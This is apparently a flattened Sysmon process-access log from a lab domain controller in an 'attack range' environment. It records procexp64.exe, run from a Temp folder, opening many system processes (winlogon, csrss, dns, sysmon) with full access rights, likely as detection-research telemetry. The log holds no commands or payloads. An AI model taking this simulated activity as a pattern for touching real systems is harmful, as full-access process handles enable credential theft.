15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785755Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785754Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785753Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785752Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785751Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785750Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785749Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785748Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785747Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785746Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785745Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785744Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785743Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785742Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785741Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785740Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785739Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785738Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785737Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785736Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785735Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785734Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785733Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785732Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785731Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785730Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785729Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:15:54.315{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000785719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 